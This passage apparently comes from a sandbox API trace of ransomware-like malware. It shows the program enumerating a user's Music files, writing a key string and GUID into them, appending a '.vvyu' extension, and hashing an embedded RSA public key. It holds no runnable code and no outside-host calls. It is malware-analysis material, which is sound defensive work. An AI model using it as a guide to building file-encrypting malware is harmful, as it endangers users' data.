hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0198.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0198.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0198.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0198.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0198.091] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0198.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0198.092] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.092] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0198.092] CloseHandle (hObject=0x584) returned 1 [0198.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0198.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x2af3f88 [0198.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0198.094] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\znTr-YRiXJ\\d4OMzSyCrSqIiU9aYvRY.wav" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\zntr-yrixj\\d4omzsycrsqiiu9ayvry.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\znTr-YRiXJ\\d4OMzSyCrSqIiU9aYvRY.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\zntr-yrixj\\d4omzsycrsqiiu9ayvry.wav.vvyu")) returned 1 [0198.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0198.104] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edcf8 | out: hHeap=0x2c0000) returned 1 [0198.108] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58d9c0f0, ftCreationTime.dwHighDateTime=0x1d897ff, ftLastAccessTime.dwLowDateTime=0x76e14d20, ftLastAccessTime.dwHighDateTime=0x1d8a6c3, ftLastWriteTime.dwLowDateTime=0x76e14d20, ftLastWriteTime.dwHighDateTime=0x1d8a6c3, nFileSizeHigh=0x0, nFileSizeLow=0x15e41, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F8iLKItDoj8FssHi0.mp3", cAlternateFileName="F8ILKI~1.MP3")) returned 1 [0198.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x29edcf8 [0198.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.109] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\znTr-YRiXJ\\F8iLKItDoj8FssHi0.mp3") returned=".mp3" [0198.109] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\znTr-YRiXJ\\F8iLKItDoj8FssHi0.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\zntr-yrixj\\f8ilkitdoj8fsshi0.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0198.109] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=89665) returned 1 [0198.109] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0198.112] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x15e1b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.112] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0198.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0198.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0198.114] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.115] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x15e41, lpOverlapped=0x0) returned 1 [0198.116] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0198.116] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.116] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.116] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b8e8) returned 1 [0198.117] CryptCreateHash (in: hProv=0x31b8e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0198.117] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.117] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0198.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0198.117] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0198.117] GetLastError () returned 0x0 [0198.117] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0198.117] CryptReleaseContext (hProv=0x31b8e8, dwFlags=0x0) returned 1 [0198.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.118] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0198.118] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0198.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.118] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0198.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0198.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0198.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x15e40) returned 0x2af5168 [0198.118] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0198.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0198.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0198.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeaa40 [0198.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6848 [0198.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeaa88 [0198.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6860 [0198.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6890 [0198.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68f0 [0198.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68a8 [0198.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0198.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0198.119] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0198.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0198.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6890 | out: hHeap=0x2c0000) returned 1 [0198.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68a8 | out: hHeap=0x2c0000) returned 1 [0198.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68f0 | out: hHeap=0x2c0000) returned 1 [0198.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0198.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68f0 [0198.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0198.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae68a8 [0198.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0198.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6890 [0198.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0198.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0198.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0198.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0198.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0198.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0198.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0198.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0198.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68a8 | out: hHeap=0x2c0000) returned 1 [0198.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6890 | out: hHeap=0x2c0000) returned 1 [0198.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0198.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0198.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68f0 | out: hHeap=0x2c0000) returned 1 [0198.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0198.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0198.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0198.122] GetCurrentThreadId () returned 0x5d8 [0198.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0198.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af2e40 [0198.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0198.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0198.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0198.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0198.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0198.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0198.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.123] GetCurrentThreadId () returned 0x5d8 [0198.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0198.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0198.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0198.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0198.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0198.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0198.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0198.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68f0 [0198.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0198.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0198.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0198.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0198.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0198.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0198.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0198.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6890 [0198.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0198.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0198.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0198.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0198.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0198.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0198.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae68a8 [0198.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0198.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0198.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0198.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6878 [0198.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0198.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6908 [0198.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0198.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68d8 [0198.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68c0 [0198.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0198.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6920 [0198.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68c0 | out: hHeap=0x2c0000) returned 1 [0198.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae68c0 [0198.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68d8 | out: hHeap=0x2c0000) returned 1 [0198.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0198.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0198.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0198.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0198.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0198.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6890 | out: hHeap=0x2c0000) returned 1 [0198.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6890 [0198.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0198.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0198.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68f0 | out: hHeap=0x2c0000) returned 1 [0198.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0198.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6920 | out: hHeap=0x2c0000) returned 1 [0198.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0198.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0198.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0198.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0198.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0198.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6890 | out: hHeap=0x2c0000) returned 1 [0198.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0198.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0198.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0198.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0198.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0198.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0198.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0198.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0198.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0198.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0198.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0198.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68c0 | out: hHeap=0x2c0000) returned 1 [0198.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6908 | out: hHeap=0x2c0000) returned 1 [0198.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0198.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68a8 | out: hHeap=0x2c0000) returned 1 [0198.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6878 | out: hHeap=0x2c0000) returned 1 [0198.134] HeapFree (in: hHeap=0x2c0000, 